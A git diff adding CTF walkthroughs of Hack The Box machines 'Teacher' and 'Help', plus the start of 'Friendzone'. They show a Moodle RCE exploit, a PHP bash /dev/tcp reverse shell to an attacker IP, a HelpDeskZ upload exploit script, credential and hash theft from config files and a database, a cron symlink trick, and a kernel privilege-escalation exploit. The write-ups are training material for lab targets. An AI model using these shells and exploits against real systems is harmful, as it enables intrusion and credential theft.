+ Moodle < 1.6.9/1.7.7/1.8.9/1. | exploits/php/webapps/8297.txt
+ Moodle Blog 1.18.2.2/1.6.2 Mo | exploits/php/webapps/28770.txt
+ Moodle Filepicker 3.5.2 - Ser | exploits/php/webapps/47177.txt
+ Moodle Help Script 1.x - Cros | exploits/php/webapps/24279.txt
+ Moodle Jmol Filter 6.1 - Dire | exploits/php/webapps/46881.txt
+ ------------------------------ ----------------------------------------
+ Shellcodes: No Result
+
+
+The php exploit number 46551 seems to be the most recent Remote Code Execution exploit available for our target, let's locate it, and copy it onto our current directory in order to see if we can get it to work.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → locate 46551.php
+ /usr/share/exploitdb/exploits/php/webapps/46551.php
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → cp /usr/share/exploitdb/exploits/php/webapps/46551.php .
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → php 46551.php
+ PHP Notice: Undefined index: url in /home/nihilist/_HTB/Teacher/46551.php on line 503
+ PHP Notice: Undefined index: user in /home/nihilist/_HTB/Teacher/46551.php on line 504
+ PHP Notice: Undefined index: pass in /home/nihilist/_HTB/Teacher/46551.php on line 505
+ PHP Notice: Undefined index: ip in /home/nihilist/_HTB/Teacher/46551.php on line 506
+ PHP Notice: Undefined index: port in /home/nihilist/_HTB/Teacher/46551.php on line 507
+ PHP Notice: Undefined index: course in /home/nihilist/_HTB/Teacher/46551.php on line 508
+
+ *------------------------------*
+ * Noodle [Moodle RCE] (v3.4.1) *
+ *------------------------------*
+
+ [!] Make sure you have a listener
+ [!] at :
+
+ [*] Logging in as user with password
+ [-] LOGIN FAILED!
+ [?] Do you have the right credentials and url?
+
+
+Seems like we need to set the url, user, pass, ip, port and course flags. Before we run it , we will setup another terminal with the nc command ready in order to catch the incoming reverse shell connection onto our 9005th port.
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Teacher] → nc -lvnp 9005
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → sudo php 46551.php url=http://10.10.10.153/moodle/ user=giovanni pass=Th4C00lTheacha# ip=10.10.14.48 port=9005 course=2
+
+
+ [sudo] password for nihilist:
+
+ *------------------------------*
+ * Noodle [Moodle RCE] (v3.4.1) *
+ *------------------------------*
+
+ [!] Make sure you have a listener
+ [!] at 10.10.14.48:9005
+
+ [*] Logging in as user giovanni with password Th4C00lTheacha#
+ [+] Successful Login
+ [>] Moodle Session v3di0tkljnuh8uepnsq5buenf0
+ [>] Moodle Key 4JU4ADDZN7
+ [*] Loading Course ID 2
+ [+] Successfully Loaded Course
+ [*] Enable Editing
+ [+] Successfully Enabled Course Editing
+ [*] Adding Quiz
+ [+] Successfully Added Quiz
+ [*] Configuring New Quiz
+ [+] Successfully Configured Quiz
+ [*] Loading Edit Quiz Page
+ [+] Successfully Loaded Edit Quiz Page
+ [*] Adding Calculated Question
+ [+] Successfully Added Calculation Question
+ [*] Adding Evil Question
+ [+] Successfully Created Evil Question
+ [*] Sending Exploit
+
+ [>] You should receive a reverse shell attempt from the target at 10.10.14.48 on port 9005
+ [>] If connection was successful this program will wait here until you close the connection.
+ [>] You should be able to Ctrl+C and retain the connection through netcat.
+
+
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Teacher] → nc -lvnp 9005
+ Connection from 10.10.10.153:41844
+ /bin/sh: 0: can't access tty; job control turned off
+ $ python -c 'import pty;pty.spawn("/bin/bash")'
+
+ www-data@teacher:/var/www/html/moodle/question$ cat /home/giovanni/user.txt
+ cat /home/giovanni/user.txt
+ cat: /home/giovanni/user.txt: Permission denied
+
+
+And we are logged in ! Although we do not have enough permissions to read the user flag. Looking within the /etc folder we see that there is phpmyadmin, entering the directory we run the grep command with the -r flag onto the dbuser and dbpass file
+
+
+ www-data@teacher:/etc$ cd /etc/phpmyadmin
+ cd /etc/phpmyadmin
+
+ www-data@teacher:/etc/phpmyadmin$ grep -r
+ grep -r
+ Usage: grep [OPTION]... PATTERN [FILE]...
+ Try 'grep --help' for more information.
+
+ www-data@teacher:/etc/phpmyadmin$ grep -r dbuser
+ grep -r dbuser
+ config.inc.php: $cfg['Servers'][$i]['controluser'] = $dbuser;
+ config-db.php:$dbuser='phpmyadmin';
+
+ www-data@teacher:/etc/phpmyadmin$ grep -r dbpass
+ grep -r dbpass
+ config.inc.php: $cfg['Servers'][$i]['controlpass'] = $dbpass;
+ config-db.php:$dbpass='Welkom1!';
+
+
+And we have credentials ! phpmyadmin:Welkom1! let's login onto the local mariaDB service.
+
+
+ www-data@teacher:/etc/phpmyadmin$ mysql -u root -p
+ mysql -u root -p
+ Enter password: Welkom1!
+
+ Welcome to the MariaDB monitor. Commands end with ; or \g.
+ Your MariaDB connection id is 93
+ Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1
+
+ Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
+
+ Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+ MariaDB [(none)]>
+
+
+And we are logged into MariaDB ! Now let's see which databases we are able to work with.
+
+
+ MariaDB [(none)]> show databases;
+ show databases;
+ +--------------------+
+ | Database |
+ +--------------------+
+ | information_schema |
+ | moodle |
+ | mysql |
+ | performance_schema |
+ | phpmyadmin |
+ +--------------------+
+ 5 rows in set (0.00 sec)
+
+
+Let's see which tables are contained within the phpmyadmin database.
+
+
+ MariaDB [(none)]> use moodle;
+ use moodle;
+ Reading table information for completion of table and column names
+ You can turn off this feature to get a quicker startup with -A
+
+ Database changed
+ MariaDB [moodle]> show tables;
+ show tables;
+ +----------------------------------+
+ | Tables_in_moodle |
+ +----------------------------------+
+ | mdl_analytics_indicator_calc |
+ | mdl_analytics_models |
+ | mdl_analytics_models_log |
+ | mdl_analytics_predict_samples |
+ | mdl_analytics_prediction_actions |
+ | mdl_analytics_predictions |
+ | mdl_analytics_train_samples |
+ | mdl_analytics_used_analysables |
+ | mdl_analytics_used_files |
+ | mdl_assign |
+
+ [...]
+
+ | **mdl_user** |
+
+ [...]
+
+ | mdl_workshopform_rubric |
+ | mdl_workshopform_rubric_config |
+ | mdl_workshopform_rubric_levels |
+ +----------------------------------+
+ 388 rows in set (0.00 sec)
+
+
+Looking at the results, we get alot of tables to work with, but there is one in particular that we'll be using which is the mdl_user table.
+
+
+ MariaDB [moodle]> select username,password from mdl_user;
+ select username,password from mdl_user;
+ +-------------+--------------------------------------------------------------+
+ | username | password |
+ +-------------+--------------------------------------------------------------+
+ | guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
+ | admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
+ | giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
+ | Giovannibak | 7a860966115182402ed06375cf0a22af |
+ +-------------+--------------------------------------------------------------+
+ 4 rows in set (0.00 sec)
+
+
+There we go ! We have hashed passwords to work with. The last hash is shorter than the others, we'll use hash-identifier in order to see if we can guess the format of the hash.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: 7a860966115182402ed06375cf0a22af
+
+ Possible Hashs:
+ [+] MD5
+ [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
+
+
+Looking at the results, we seem to have a MD5 encrypted hash to work with, let's google the hash with the keyword MD5 in order to see if google knows the original password that was there before the md5 hashing.
+
+
+
+And there we have it ! the password was "expelled" Now let's see if we can login as the giovanni user.
+
+
+ www-data@teacher:/etc/phpmyadmin$ su giovanni
+ su giovanni
+ Password: expelled
+
+ giovanni@teacher:/etc/phpmyadmin$ cat /home/giovanni/user.txt
+ cat /home/giovanni/user.txt
+ faXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And there we go ! We now have been able to login as giovanni, and therefore we now have enough privileges to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+In order to get the root access, we first start poking around the /usr/bin/ folder and we find something interesting when we grep the result of the ls command with the keyword "backup"
+
+
+ giovanni@teacher:/etc/phpmyadmin$ ls -la /usr/bin | grep backup
+ ls -la /usr/bin | grep backup
+ -rwxr-xr-x 1 root root 138 Jun 27 2018 backup.sh
+ -rwxr-xr-x 1 root root 17879752 Aug 10 2017 mariabackup
+ -rwxr-xr-x 1 root root 32066 Aug 10 2017 wsrep_sst_mariabackup
+ -rwxr-xr-x 1 root root 21662 Aug 10 2017 wsrep_sst_xtrabackup
+ -rwxr-xr-x 1 root root 31670 Aug 10 2017 wsrep_sst_xtrabackup-v2
+
+ giovanni@teacher:/etc/phpmyadmin$ cat /usr/bin/backup.sh
+ cat /usr/bin/backup.sh
+ #!/bin/bash
+ cd /home/giovanni/work;
+ tar -czvf tmp/backup_courses.tar.gz courses/*;
+ cd tmp;
+ tar -xf backup_courses.tar.gz;
+ chmod 777 * -R;
+
+
+It seems like the backup.sh script is being run with root privileges, One important part of the script is that it is running the **chmod 777 *** command within the /tmp folder. Therefore we just have to create a shortcut to the root folder into the /home/giovanni/work/tmp folder, Once the script is being run, we should have access to the root directory and it's contents.
+
+
+ giovanni@teacher:~/work/tmp$ ln -s / caca
+ ln -s / caca
+ giovanni@teacher:~/work/tmp$ ls
+ ls
+ backup_courses.tar.gz caca courses
+ giovanni@teacher:~/work/tmp$ cd /
+ cd /
+ giovanni@teacher:/$ ls -la
+ ls -la
+ total 84
+ drwxr-xr-x 22 root root 4096 Oct 28 2018 .
+ drwxr-xr-x 22 root root 4096 Oct 28 2018 ..
+ drwxr-xr-x 2 root root 4096 Oct 28 2018 bin
+ drwxr-xr-x 3 root root 4096 Oct 28 2018 boot
+ drwxr-xr-x 17 root root 3080 Dec 6 17:19 dev
+ drwxr-xr-x 84 root root 4096 Oct 28 2018 etc
+ drwxr-xr-x 3 root root 4096 Jun 27 2018 home
+ lrwxrwxrwx 1 root root 29 Oct 28 2018 initrd.img -> boot/initrd.img-4.9.0-8-amd64
+ lrwxrwxrwx 1 root root 29 Oct 28 2018 initrd.img.old -> boot/initrd.img-4.9.0-6-amd64
+ drwxr-xr-x 15 root root 4096 Jun 27 2018 lib
+ drwxr-xr-x 2 root root 4096 Jun 27 2018 lib64
+ drwx------ 2 root root 16384 Jun 27 2018 lost+found
+ drwxr-xr-x 3 root root 4096 Jun 27 2018 media
+ drwxr-xr-x 2 root root 4096 Jun 27 2018 mnt
+ drwxr-xr-x 2 root root 4096 Jun 27 2018 opt
+ dr-xr-xr-x 92 root root 0 Dec 6 17:19 proc
+ drwx------ 3 root root 4096 Nov 4 2018 root
+ drwxr-xr-x 18 root root 500 Dec 6 17:20 run
+ drwxr-xr-x 2 root root 4096 Oct 28 2018 sbin
+ drwxr-xr-x 2 root root 4096 Jun 27 2018 srv
+ dr-xr-xr-x 13 root root 0 Dec 6 18:51 sys
+ drwxrwxrwt 2 root root 4096 Dec 6 18:51 tmp
+ drwxr-xr-x 10 root root 4096 Jun 27 2018 usr
+ drwxr-xr-x 12 root root 4096 Jun 27 2018 var
+ lrwxrwxrwx 1 root root 26 Oct 28 2018 vmlinuz -> boot/vmlinuz-4.9.0-8-amd64
+ lrwxrwxrwx 1 root root 26 Oct 28 2018 vmlinuz.old -> boot/vmlinuz-4.9.0-6-amd64
+ giovanni@teacher:/$
+
+
+Wait a minute for the cronjob to execute the script, which should change every folder to the 777 permissions
+
+
+ drwxrwxrwx 2 root root 4096 Oct 28 2018 bin
+ drwxrwxrwx 3 root root 4096 Oct 28 2018 boot
+ drwxrwxrwx 17 root root 3080 Dec 6 17:19 dev
+ drwxrwxrwx 84 root root 4096 Oct 28 2018 etc
+ drwxrwxrwx 3 root root 4096 Jun 27 2018 home
+ lrwxrwxrwx 1 root root 29 Oct 28 2018 initrd.img -> boot/initrd.img-4.9.0-8-amd64
+ lrwxrwxrwx 1 root root 29 Oct 28 2018 initrd.img.old -> boot/initrd.img-4.9.0-6-amd64
+ drwxrwxrwx 15 root root 4096 Jun 27 2018 lib
+ drwxrwxrwx 2 root root 4096 Jun 27 2018 lib64
+ drwxrwxrwx 2 root root 16384 Jun 27 2018 lost+found
+ drwxrwxrwx 3 root root 4096 Jun 27 2018 media
+ drwxrwxrwx 2 root root 4096 Jun 27 2018 mnt
+ drwxrwxrwx 2 root root 4096 Jun 27 2018 opt
+ drwxrwxrwx 92 root root 0 Dec 6 17:19 proc
+ drwxrwxrwx 3 root root 4096 Nov 4 2018 root
+ drwxrwxrwx 18 root root 500 Dec 6 17:20 run
+ drwxrwxrwx 2 root root 4096 Oct 28 2018 sbin
+ drwxrwxrwx 2 root root 4096 Jun 27 2018 srv
+ drwxrwxrwx 13 root root 0 Dec 6 18:51 sys
+ drwxrwxrwx 2 root root 4096 Dec 6 18:51 tmp
+ drwxrwxrwx 10 root root 4096 Jun 27 2018 usr
+ drwxrwxrwx 12 root root 4096 Jun 27 2018 var
+ lrwxrwxrwx 1 root root 26 Oct 28 2018 vmlinuz -> boot/vmlinuz-4.9.0-8-amd64
+ lrwxrwxrwx 1 root root 26 Oct 28 2018 vmlinuz.old -> boot/vmlinuz-4.9.0-6-amd64
+
+
+See how every folder has got it's permissions changed , now we should be able to navigate into /root and print out the root flag.
+
+
+ giovanni@teacher:/$ cd root
+ cd root
+ giovanni@teacher:/root$ cat root.txt
+ cat root.txt
+ 4fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we got the root flag now.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/27.md b/Easy/27.md
new file mode 100644
index 0000000..086b691
--- /dev/null
+++ b/Easy/27.md
@@ -0,0 +1,400 @@
+# Help Writeup
+
+
+
+## Introduction :
+
+Help is an easy Linux box that was released back in January 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → nmap -F 10.10.10.121 --top-ports 60000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 19:59 CET
+ Nmap scan report for 10.10.10.121
+ Host is up (0.037s latency).
+ Not shown: 8317 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+ 3000/tcp open ppp
+
+ Nmap done: 1 IP address (1 host up) scanned in 10.09 seconds
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → nmap -sCV -p 22,80,3000 10.10.10.121
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 19:59 CET
+ Nmap scan report for 10.10.10.121
+ Host is up (0.030s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
+ | 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
+ |_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Apache2 Ubuntu Default Page: It works
+ 3000/tcp open http Node.js Express framework
+ |_http-title: Site doesn't have a title (application/json; charset=utf-8).
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 19.83 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan seems to have picked up 2 interesting ports here : 80 and 3000. Let's run a dirsearch command on both these ports to enumerate what folders may be available for us to browse.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → dirsearch -u http://10.10.10.121/ -e php -x 403 -r
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → dirsearch -u http://10.10.10.121:3000/ -e php -x 403 -r
+
+ Target: http://10.10.10.121:3000/
+
+ [20:04:07] Starting:
+ [20:04:21] 400 - 18B - /graphql
+ [20:04:21] 400 - 18B - /graphql/console/
+
+ Task Completed
+
+
+
+Looking at the results, we see that dirsearch wasn't able to find alot of folders for the 3000th port, however it was able to find much more for the 80th port.
+
+
+ [20:04:08] Starting:
+ [20:04:23] 200 - 11KB - /index.md
+ [20:04:23] 301 - 317B - /javascript -> http://10.10.10.121/javascript/
+ [20:04:31] 301 - 314B - /support -> http://10.10.10.121/support/
+ [20:04:34] Starting: javascript/
+ [20:05:00] Starting: support/
+ [20:05:00] 200 - 378B - /support/.gitattributes
+ [20:05:10] 301 - 318B - /support/css -> http://10.10.10.121/support/css/
+ [20:05:12] 200 - 1KB - /support/favicon.ico
+ [20:05:14] 301 - 321B - /support/images -> http://10.10.10.121/support/images/
+ [20:05:14] 301 - 323B - /support/includes -> http://10.10.10.121/support/includes/
+ [20:05:14] 302 - 0B - /support/includes/ -> /
+ [20:05:14] 200 - 4KB - /support/index.php/login/
+ [20:05:14] 200 - 4KB - /support/index.php
+ [20:05:15] 301 - 317B - /support/js -> http://10.10.10.121/support/js/
+ [20:05:15] 301 - 325B - /support/js/tinymce -> http://10.10.10.121/support/js/tinymce/
+ [20:05:15] 302 - 0B - /support/js/tinymce/ -> /
+ [20:05:15] 200 - 18KB - /support/LICENSE.txt
+ [20:05:20] 200 - 7KB - /support/readme.html
+ [20:05:20] 200 - 3KB - /support/README.md
+ [20:05:24] 301 - 322B - /support/uploads -> http://10.10.10.121/support/uploads/
+ [20:05:24] 302 - 0B - /support/uploads/ -> /
+ [20:05:25] Starting: css/
+ [20:05:50] Starting: images/
+ [20:06:15] Starting: includes/
+ [20:06:40] Starting: js/
+ [20:07:05] Starting: uploads/
+
+ Task Completed
+
+
+
+
+
+navigating to the 80th port's /support page, we are redirected to a helpdeskz webpage. Let's run a quick searchsploit command in order to get an idea of the exploits we could use for this webservice.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → searchsploit helpdeskz
+ ------------------------------------ ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------ ----------------------------------------
+ HelpDeskZ 1.0.2 - Arbitrary File Up | exploits/php/webapps/40300.py
+ HelpDeskZ < 1.0.2 - (Authenticated) | exploits/php/webapps/41200.py
+ ------------------------------------ ----------------------------------------
+ Shellcodes: No Result
+
+
+Looks like we may have a python script for us to use. Let's first locate where it is located in our system, and copy it to our current directory.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → locate 40300.py
+ /usr/share/exploitdb/exploits/php/webapps/40300.py
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → cp /usr/share/exploitdb/exploits/php/webapps/40300.py .
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → ls
+ 40300.py
+
+
+Looking at the github page for helpdeskz, especially the [php file](https://github.com/evolutionscript/HelpDeskZ-1.0/blob/master/controllers/submit_ticket_controller.php) that handles the ticket submissions, We see that the code seems to possess a few vulnerabilities.
+
+
+
+First of all, we see that the upload directory should end with tickets/
+
+Second, we see that the uploaded file gets appended a timestamp to it, and then gets hashed through the md5 algorithm.
+
+To find out about the time running onto the machine, we can simply use the curl command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → curl -v http://10.10.10.121/support/
+ * Trying 10.10.10.121:80...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.121 (10.10.10.121) port 80 (#0)
+ > GET /support/ HTTP/1.1
+ > Host: 10.10.10.121
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ < HTTP/1.1 200 OK
+ < Date: Fri, 06 Dec 2019 19:35:42 GMT
+ < Server: Apache/2.4.18 (Ubuntu)
+ < Set-Cookie: PHPSESSID=e9fa26li4655k4nrm8pk3aa0g2; path=/
+ < Expires: Thu, 19 Nov 1981 08:52:00 GMT
+ < Cache-Control: no-store, no-cache, must-revalidate
+ < Pragma: no-cache
+ < Set-Cookie: lang=english; expires=Fri, 13-Dec-2019 19:35:42 GMT; Max-Age=604800
+ < Vary: Accept-Encoding
+ < Content-Length: 4453
+ < Content-Type: text/html; charset=UTF-8
+ <
+
+
+
+Since the people that wrote the script seem to have forgotten the parentheses to literally every single print statement, we'll finish their job using the CLI text editor called "nano"
+
+
+ import hashlib
+ import time
+ import sys
+ import requests
+
+ print('Helpdeskz v1.0.2 - Unauthenticated shell upload exploit')
+
+ if(len(sys.argv) < 3):
+ print("Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0]))
+ sys.exit(1)
+
+ helpdeskzBaseUrl = sys.argv[1]
+ fileName = sys.argv[2]
+
+ currentTime = int(time.time())
+
+ for x in range(300, 600):
+ plaintext = fileName + str(currentTime - x)
+ **plaintext = plaintext.encode('utf-8')**
+ md5hash = hashlib.md5(plaintext).hexdigest()
+
+ url = helpdeskzBaseUrl+md5hash+'.php'
+ response = requests.head(url)
+ if response.status_code == 200:
+ print("found!")
+ print(url)
+ sys.exit(0)
+
+ print("Sorry, I did not find anything")
+
+
+Do not forget to add the highlighted line of code
+
+let's not forget our reverse php shell one liner that we will save as nihilist.php
+
+
+ <****?php
+ echo("nihilist WAS HERE");
+ exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.48/9001 0>&1'");
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → nano nihilist.php
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → chmod 777 nihilist.php
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → ls -l
+ total 8
+ -rwxr-xr-x 1 nihilist users 690 Dec 6 20:50 40300.py
+ -rwxrwxrwx 1 nihilist users 99 Dec 6 20:51 nihilist.php
+
+
+Now before we upload our reverse shell nihilist.php onto through the helpdeskz ticket submission, and then try to browse to it using the correct python script, we ready our first terminal with the nc command to catch the incoming reverse shell connection onto our 9001st port, and we ready the python script inside the second terminal, because we do not want to waste much time, as the timestamp here is important for the exploit to be successful.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → nc -lvnp 9001
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → python 40300.py http://10.10.10.121/support/uploads/tickets/ nihilist.php
+
+
+
+
+as we click submit, we run the python script right after , so that we make sure that our python script can find our timestamped md5 hashed shell.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → nc -lvnp 9001
+ Connection from 10.10.10.121:58982
+ bash: cannot set terminal process group (809): Inappropriate ioctl for device
+ bash: no job control in this shell
+
+ help@help:/var/www/html/support/uploads/tickets$ ls
+ ls
+ 17045dc4fa593d3df5b756a6f58a5e4b.php
+ 2fd3b632dbedfa05adcf9ba1c7cdfef1.php
+ a963f7fea2767b2edcab7045b8be9deb.php
+ dbdb2a8bb1ec0bda7b527398d2427d60.php
+ index.php
+
+ help@help:/var/www/html/support/uploads/tickets$ cat /home/help/user.txt
+ cat /home/help/user.txt
+ bbXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it for the user part ! We have been able to login as the "help" user, and we now have it's user flag.
+
+## **Part 3 : Getting Root Access**
+
+Running a quick uname command with the -a flag we see that the box may be vulnerable to a kernel exploit.
+
+
+ help@help:/var/www/html/support/uploads/tickets$ uname -a
+ uname -a
+ Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+
+
+so let's see which exploit is available for this kernel version, using the searchsploit command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → searchsploit linux 4.4.0-116
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+Seems like we will use the C exploit n°44298. Let's locate it and copy it onto our current directory.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → locate 44298.c
+ /home/nihilist/_HTB/Bashed/44298.c
+ /usr/share/exploitdb/exploits/linux/local/44298.c
+
+
+Fun Fact : we're going to privesc the exact same way as we did back on the [Bashed](15.html) machine.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → cp /usr/share/exploitdb/exploits/linux/local/44298.c .
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → ls
+ 40300.py 44298.c nihilist.php
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → gcc 44298.c -o nihilist.privesc
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → python -m SimpleHTTPServer 9999
+ /usr/bin/python: No module named SimpleHTTPServer
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → python2 -m SimpleHTTPServer 9999
+ Serving HTTP on 0.0.0.0 port 9999 ...
+
+
+Once we compiled the exploit into the nihilist.privesc executable, we use python2's SimpleHTTPServer module on port 9999 to be able to upload the file onto the machine
+
+
+ help@help:/var/www/html/support/uploads/tickets$ which curl
+ which curl
+ help@help:/var/www/html/support/uploads/tickets$ which wget
+
+ which wget
+ /usr/bin/wget
+
+
+Seems like we won't be able to use curl to download the executable, but that's no problem, since wget is there to save us.
+
+
+ help@help:/var/www/html/support/uploads/tickets$ wget http://10.10.14.48:9999/nihilist.privesc
+ <****port/uploads/tickets$ wget http://10.10.14.48:9999/nihilist.privesc
+ --2019-12-06 12:28:38-- http://10.10.14.48:9999/nihilist.privesc
+ Connecting to 10.10.14.48:9999... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 17872 (17K) [application/octet-stream]
+ Saving to: 'nihilist.privesc'
+
+ 0K .......... ....... 100% 482K=0.04s
+
+ 2019-12-06 12:28:38 (482 KB/s) - 'nihilist.privesc' saved [17872/17872]
+
+ help@help:/var/www/html/support/uploads/tickets$ ls
+ ls
+ 17045dc4fa593d3df5b756a6f58a5e4b.php
+ 2fd3b632dbedfa05adcf9ba1c7cdfef1.php
+ a963f7fea2767b2edcab7045b8be9deb.php
+ dbdb2a8bb1ec0bda7b527398d2427d60.php
+ nihilist.privesc
+ index.php
+
+ help@help:/var/www/html/support/uploads/tickets$ ./nihilist.privesc
+ ./nihilist.privesc
+ bash: ./nihilist.privesc: Permission denied
+
+Let's not forget to change the executable's permissions to actually make it executable :
+
+
+ help@help:/var/www/html/support/uploads/tickets$ chmod +x nihilist.privesc
+ chmod +x nihilist.privesc
+
+ help@help:/var/www/html/support/uploads/tickets$ ./nihilist.privesc
+ ./nihilist.privesc
+
+ id
+ uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
+
+ cat /root/root.txt
+ b7XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/28.md b/Easy/28.md
new file mode 100644
index 0000000..da9d101
--- /dev/null
+++ b/Easy/28.md
@@ -0,0 +1,606 @@
+# Friendzone Writeup
+
+
+
+## Introduction :
+
+Friendzone is an easy Linux box released back in Febuary 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -F 10.10.10.123
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-07 09:04 CET
+ Nmap scan report for 10.10.10.123
+ Host is up (0.15s latency).
+ Not shown: 93 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 22/tcp open ssh
+ 53/tcp open domain
+ 80/tcp open http
+ 139/tcp open netbios-ssn
+ 443/tcp open https
+ 445/tcp open microsoft-ds
